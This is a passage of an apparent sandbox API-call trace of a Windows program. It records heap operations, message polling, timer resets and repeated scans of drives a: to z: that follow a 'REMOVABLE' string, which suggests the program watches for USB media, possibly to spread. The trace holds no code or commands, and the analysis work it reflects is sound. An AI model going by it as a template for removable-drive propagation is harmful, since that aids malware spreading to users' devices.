cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.173] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0219.173] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0219.173] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0219.173] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.173] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.173] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.173] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.173] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.173] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0219.174] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.174] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.174] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.174] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.174] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0219.174] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0219.174] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.174] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.174] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.176] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.176] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.176] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.177] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.177] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.177] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.177] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.178] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.178] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.178] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.178] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.179] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.179] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.179] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.180] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.180] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.180] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.181] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.181] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.181] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.181] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.181] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.182] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.182] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.182] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0219.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.182] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0219.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0219.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.183] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f40 [0219.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f40 | out: hHeap=0x12c0000) returned 1 [0219.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0219.183] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0219.183] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0219.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.184] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.184] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0219.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0219.184] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.184] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0219.184] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0219.184] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0219.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.184] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0219.184] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.184] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.184] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.184] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.185] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0219.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0219.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0219.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.185] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.185] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.185] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.185] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.185] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.186] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.186] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.186] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.186] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.187] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.187] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.187] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.187] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.187] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.187] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.188] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.188] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.188] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.188] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.189] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.189] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.189] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.189] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.190] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.190] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.190] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.190] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.191] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.191] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.191] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0219.191] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.191] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0219.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0219.191] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.191] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.191] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.191] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.192] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.192] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.192] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.192] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.192] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.192] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e00 [0219.192] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e00 | out: hHeap=0x12c0000) returned 1 [0219.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.192] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0219.192] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0219.193] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0219.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0219.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.193] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.193] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0219.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.194] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.194] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.194] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0219.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.194] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0219.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0219.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0219.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.195] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.195] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.195] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.195] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.195] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.196] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.196] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.196] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.197] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.197] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.197] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.197] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.198] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.198] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.198] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.198] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.198] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.198] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.199] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.199] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.199] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.199] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.199] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.200] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.200] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.200] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.201] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0219.201] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.201] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.201] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0219.201] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.201] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.202] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.202] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.202] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.202] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.202] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.202] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.202] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.202] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e80 [0219.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.203] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e80 | out: hHeap=0x12c0000) returned 1 [0219.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.203] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0219.203] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0219.203] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0219.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.203] HeapFree 